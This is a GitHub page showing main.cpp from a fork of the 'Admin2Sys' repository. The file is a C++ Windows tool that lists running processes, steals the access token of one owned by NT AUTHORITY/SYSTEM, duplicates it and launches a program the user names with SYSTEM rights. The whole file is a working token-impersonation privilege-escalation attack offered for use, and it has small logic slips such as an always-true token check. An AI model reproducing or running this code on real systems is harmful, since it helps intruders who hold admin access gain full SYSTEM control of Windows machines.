forked from S12cybersecurity/Admin2Sys
-
Notifications
You must be signed in to change notification settings - Fork 0
/
main.cpp
112 lines (102 loc) · 3.14 KB
/
main.cpp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
#include <windows.h>
#include <tlhelp32.h>
#include <iostream>
#include <string>
using namespace std;
HANDLE getToken(DWORD pid) {
string userProcess;
HANDLE cToken = NULL;
HANDLE ph = NULL;
ph = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, true, pid);
if (ph == NULL) {
cToken = (HANDLE)NULL;
} else {
BOOL res = OpenProcessToken(ph, MAXIMUM_ALLOWED, &cToken);
if (!res) {
cToken = (HANDLE)NULL;
} else {
}
}
if (ph != NULL) {
CloseHandle(ph);
}
return cToken;
}
BOOL createProcess(HANDLE token, LPCWSTR app) {
// initialize variables
HANDLE dToken = NULL;
STARTUPINFOW si;
PROCESS_INFORMATION pi;
BOOL res = TRUE;
ZeroMemory(&si, sizeof(STARTUPINFOW));
ZeroMemory(&pi, sizeof(PROCESS_INFORMATION));
si.cb = sizeof(STARTUPINFOW);
res = DuplicateTokenEx(token, MAXIMUM_ALLOWED, NULL, SecurityImpersonation, TokenPrimary, &dToken);
res = CreateProcessWithTokenW(dToken, LOGON_WITH_PROFILE, app, NULL, 0, NULL, NULL, &si, &pi);
return res;
}
string GetProcessUserName(DWORD pid) {
HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, pid);
if (!hProcess) return "";
HANDLE hToken = NULL;
if (!OpenProcessToken(hProcess, TOKEN_QUERY, &hToken)) {
CloseHandle(hProcess);
return "";
}
DWORD dwSize = 0;
GetTokenInformation(hToken, TokenUser, NULL, 0, &dwSize);
PTOKEN_USER pTokenUser = (PTOKEN_USER)malloc(dwSize);
SID_NAME_USE SidType;
char lpName[MAX_PATH];
DWORD dwNameSize = MAX_PATH;
char lpDomain[MAX_PATH];
DWORD dwDomainSize = MAX_PATH;
if (!LookupAccountSid(NULL, pTokenUser->User.Sid, lpName, &dwNameSize, lpDomain, &dwDomainSize, &SidType)) {
free(pTokenUser);
CloseHandle(hToken);
CloseHandle(hProcess);
return "";
}
string username(lpDomain);
username += "/";
username += lpName;
free(pTokenUser);
CloseHandle(hToken);
CloseHandle(hProcess);
return username;
}
int main(){
string username;
HANDLE hProcSnap;
PROCESSENTRY32 pe32;
string app;
string userProcess;
int pid = 0;
hProcSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
pe32.dwSize = sizeof(PROCESSENTRY32);
cout << "Enter the path of the application you want to run as SYSTEM: ";
cin >> app;
wstring wapp = wstring(app.begin(), app.end());
LPCWSTR LPCapp = wapp.c_str();
if(!Process32First(hProcSnap, &pe32)) {
CloseHandle(hProcSnap);
return 0;
}
while (Process32Next(hProcSnap, &pe32)) {
pid = pe32.th32ProcessID;
username = GetProcessUserName(pid);
if (username == "" || username == "NT AUTHORITY/SYSTEM") {
// get username of process
bool success = false;
HANDLE cToken = getToken(pid);
if (cToken != NULL || cToken == 0){
success = createProcess(cToken, LPCapp);
if(success){
break;
}
}
}
}
CloseHandle(hProcSnap);
return 0;
}